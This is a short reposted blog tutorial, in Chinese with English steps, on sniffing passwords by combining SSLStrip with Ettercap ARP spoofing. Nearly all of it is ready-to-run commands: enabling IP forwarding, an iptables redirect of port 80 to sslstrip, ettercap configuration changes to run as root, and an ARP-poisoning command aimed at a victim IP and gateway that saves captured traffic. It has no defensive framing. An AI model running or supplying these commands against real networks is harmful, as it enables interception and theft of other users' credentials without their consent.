zoukankan      html  css  js  c++  java
  • 利用SSLStrip & Ettercap ARP欺骗嗅探密码

    apt-get purge ettercap
    apt-get purge sslstrip
    apt-get install ettercap
    apt-get install sslstrip

    echo '1' > /proc/sys/net/ipv4/ip_forward

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    sslstrip -l 8080


    # from http://blog.csdn.net/ghosttzs

    First you need to configure ettecap for sniffing a ssl connection. Open etter.confand edit the lines:
        
        [privs]
        ec_uid = 65534 # nobody is the default
        ec_gid = 65534 # nobody is the default


        to

        [privs]
        ec_uid = 0 # nobody is the default
        ec_gid = 0 # nobody is the default

        # if you use iptables:
        #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
        #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"


        to this

        # if you use iptables:
        redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

        redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"


        Next information that you need is the victim ip and the gateway ip. Let's assume that the victim ip is 10.0.0.2 and the gateway is 10.0.0.1:

        ettercap -Tq -i eth0 -M arp:remote /10.0.0.2/ /10.0.0.1/  -w /root/Desktop/HiRoot/test.cap


    转载请注明出处

  • 相关阅读:
    【python-plt】二元正态密度函数图像
    【python-plt】一元正态分布图像
    【7】极大似然估计与贝叶斯估计
    实变函数【1】集合
    图形学-心得
    分布式网络架构
    shader的内置变量
    图形学-绘制
    python加载图片
    linux下批量删除utf8 bom
  • 原文地址:https://www.cnblogs.com/y0umer/p/3838898.html
Copyright © 2011-2022 走看看